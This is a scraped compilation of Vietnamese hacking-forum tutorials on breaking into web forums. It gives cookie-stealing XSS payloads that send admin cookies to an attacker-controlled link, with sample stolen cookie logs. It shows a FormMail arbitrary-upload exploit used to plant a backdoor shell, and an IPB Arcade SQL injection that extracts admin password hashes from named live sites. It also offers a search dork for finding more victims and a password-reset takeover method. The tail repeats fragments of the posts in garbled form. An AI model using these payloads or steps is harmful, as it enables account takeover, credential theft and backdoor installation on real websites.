<BODY> <img scr="link file ảnh để fake admin tập 2">he</img> </BODY> </HTML> Bước 2 : gửi admin đoạn code sau Code: <pre a='>' onmouseover='document.location="link/giupemdianh.php?helpme="+document.co okie' b=' [img]Link fake admin tập 1[/img] Chỉ cần admin di chuột qua cái image là toi Chú ý rõ là HTML phải on nhá, không thì húp cám Ta còn có thể exploit qua bug mới tôi vừa found sáng này : Xss Smilies Album 1.1.0 phpBB ( 2.0.x - 2.0.21 ) Cop cái đoạn exploit XSS Code: <script>document.location.replace('link?helpme='+document.cookie);</script> vào đầu file image .gif up qua phpBB2/smilies_upload.php => smilies_mod/upload/5467caf8d93b8dbadfsdherh24b52511.gif send cho admin Bước 3: Chờ đợi admin reply, kiểm tra trên host mình file log sẽ có dạng : Code: Xforums_data=a:7:{s:41:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=aDFpeGplc2LKctkzOTIuygb1YjI5OTI2LKJkODDCMDhlYzhjM5G6dzN mMDplbmdsnvGV; user=KctkzOTIuygbtYWdlOjljZGZiNDjhyrGBVDLO896HGb6Nzg2NGM5MTY 3YTE1OjEwOjowOjA6MahbOjo0; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"xxxxxxxxxxxxxxxxxxxxxxxxxxxx\ ";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=dfg788hse643a527bdeafcgh674ng hash đây xxxxxxxxxxxxxxxxxxxxxxxxxxxx => Crack hash hoặc fake cookie Fake cookie đã có bài roài xem lại nhá Bài viết trên có phần đóng góp của lão Comp ( lão đóng góp we' j` đâu , lão hỏi có bit chơi cookie vBB k0, em mới tập tọe làm cho cả phpBB ), mong lão đừng chat với em nhá lão chat với em YM! của em die lun dinhcaohack(vniss) Hướng dẩn hack lổi Jacks FormMail.php Remote File Bài viết mang tính tham khảo, được lấy từ Elite Hacking Zone của MATRIX 2K Hacker Association trước đây . Đọc bài về lổi formmail.php trên security.com.vn Jacks FormMail.php Remote File Upload Author: http://www.dtheatre.com/scripts/ Credits: e_D Website: http://penguin-skills.com Một lỗi nằm trong Jack's Formail ( Script thường được sử dụng ) cho phép Hacker từ xa có thể upload bất cứ file nào lên bất cứ thư mục nào trong hệ thống . Lỗi được khai thác nằm ở đây Code: <input type="hidden" name="MAX_FILE_SIZE" value="1000000"> <input type="hidden" name="path_to_file" value="/www/uploaded/files"> Đây là một cách tấn công cổ điển nhưng rất hữu dụng , nó là một phần trong kiểu " Input Validation Attacks " Lỗi xảy ra với rất nhiều website Domain . BugSearch - Security.com.vn Nên coi thử upload như thê nào: Và upload bằng form thông qua js như sau: trang test: http://www.paulmarajewellers.com/order/formmail.php Trích: The form was not submitted for the following reasons: I NEED VALID RECIPIENT EMAIL ADDRESS TO CONTINUE Please use your browser's back button to return to the form and try again. Lợi dung bài viêt của Bugsearch Code: <input type="hidden" name="MAX_FILE_SIZE" value="1000000"> <input type="hidden" name="path_to_file" value="/www/uploaded/files"> Nên dùng js để upload lên site đó như sau: Code: javascript:void(document.write("<form action=formmail.php method=post enctype=multipart/form-data><input type=hidden name=recipient value=hacker@yahoo.com><input type=hidden name=MAX_FILE_SIZE value=1000000><input type=hidden name=path_to_file value=./><input type=file name=file><input type=submit></form>")) kết quả: Trích: http://www.paulmarajewellers.com/order/ts.txt Vâng các bạn có thể up remview lên được rồi đó Neo(VNISS) Hướng Dẫn Hack Forum IBF Và Upload Backdoor Lên Hosting hò! Vì dạo này bận rộn suốt nên ít quân tâm đến anh em! hôm nay rãnh rỗi tý, nên muốn trao đổi tý kinh nghiệm hack và upload backdoor lên Hosting thông qua việc hack Forum với các anh em! bài viết này cũng mún tặng Necromancer! Smod của Vniss! Và cũng mong rằng Necromancer và các anh em có thêm kinh nghiệm trong hacking! ok! Nói về kỹ thuật upload backdoor lên hosting qua việc hack forum trứớc nhưng vì trứớc đây đã từng post bài rồi! do lão NEO backup thế nào mà mất tiêu mấy bài! hic! nên trong khi viết bài thì nói luôn vậy! hò! Mấy hôm trước trungthep và dinhcaohack và dondoc và một số anh em có bàn về lỗi BUG GAME Arcade trong Forum VBB! Rồi ku dondoc dưa cai link bug : http://milw0rm.com/exploits/1296 thấy hay hay! và thấy răng bên VBB thì khó mà lấy được pass của Admin để Login vào ACP! nên quyết định chọn thằng IBP để hack ! và chắc là có thể lấy được pass Login của Admin! để rồi có thể upload backdoor lên hosting ! ok bây giờ nhìn vào phàn Bug xem nào!: Trích: IPB: index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user] đây là phần Bug ở phần Game Arcade! nó có 2 loại dành cho cả IBP và VBB! ngoài cái Bug này thì phần Arcade này còn dính một số Bug nũă! nhưng mà khó khai thác và có cái ko thể khai thác được! ok! vậy thì tìm site dính BUG xem nào : vào Google tìm với từ khóa : Trích: allinurl:"index.php?act=Arcade" Có đến hơn 100 nghàn Site dạng kiểu đó ! thoải mái tìm Site để anh em check và hack! hò! mình chọn http://nubcake.com/index.php?act=Arcade và link BUG của nó sẽ là: http://nubcake.com/index.php?act=Arc =report&user=1 Test Bug: Thêm dấu ' vào: báo lỗi : Trích: : mySQL query error: SELECT name FROM ibf_members WHERE id=1' mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 mySQL error code: Date: Tuesday 04th of April 2006 01:07:27 PM SQL inject roài! muốn biết cách khai thác thì các bạn có thể đọc bài viết về tư duy! kỹ thuật khai thác SQL trong Forum tại đây: https://www.vniss.net/xforce/showthread.php?t=400 còn ta có link khai thác Pass của admin là là: http://nubcake.com/index.php?act=Arcade&module=report&user=- 1%20union%20select%20password%20from%20ibf_members %20where%20id=1 hiện ra: Trích: Player Details for 8005125c396680661893d36fc0723158 Pass Hash đấy! bạn có thể FAKE IP để vào forum thành Admin ! OK nhưng mà bây giờ Trungthep sẽ nói đến phương án khác!vì nếu dừng lại ở đó! thì bạn chỉ có mỗi pass Admin ở dạng PASS HASH đã mã hóa MD5 rồi! Như vậy thì chỉ có thể vào Forum! mà ko thể vào ACP đựoc! vậy bây giờ chúng ta sẽ tìm cách để có thể có pass admin ở để Login vào ACP! đầu tiên là bạn tìm xem nick Admin của nó! xem số Id của nó là bâo nhiêu? thông thường là 1! ok! sau đó vào chọn phần quên mật khẩu! vào: http://nubcake.com/index.php?act=Reg&CODE=10 nhập vào đó tên của admin mà mình muốn lấy Pass! nhập vào : Rob ok! có trường hợp thì phải nhập Email! mà muốn lấy Email thì dùng luôn câu lệnh Select mà lấy email của admin site đó luôn! dễ thôi mà! ok! sau đó ! bạn vào quay trở lại link Bug! và sử dụng câu lệnh truy vấn để Select cái Pass mà Server gửi cho admin Rob đó! giải thích về loại pass này thì khi mà mình forgot Pass thì Server sẽ tạo cho Victim 1 cái pass mã hóa (mã hóa theo MD5) và sẽ gửi link đến mail đã đằng ký cho Victim. và khi Run cái đoạn link đó! thì sẽ có 1 link form hiện ra cho phép mình nhập pass mới vào! mà ko cần nhập vào pass cũ! . javascript:void(document.write("<form action=formmail.php method=post enctype=multipart/form-data><input type=hidden name=recipient value =hacker@ yahoo.com><input type=hidden name=MAX_FILE_SIZE value=1000000><input. http://penguin-skills.com Một lỗi nằm trong Jack's Formail ( Script thường được sử dụng ) cho phép Hacker từ xa có thể upload bất cứ file nào lên bất cứ thư mục nào trong hệ thống . Lỗi được. FormMail.php Remote File Bài viết mang tính tham khảo, được lấy từ Elite Hacking Zone của MATRIX 2K Hacker Association trước đây . Đọc bài về lổi formmail.php trên security.com.vn Jacks FormMail.php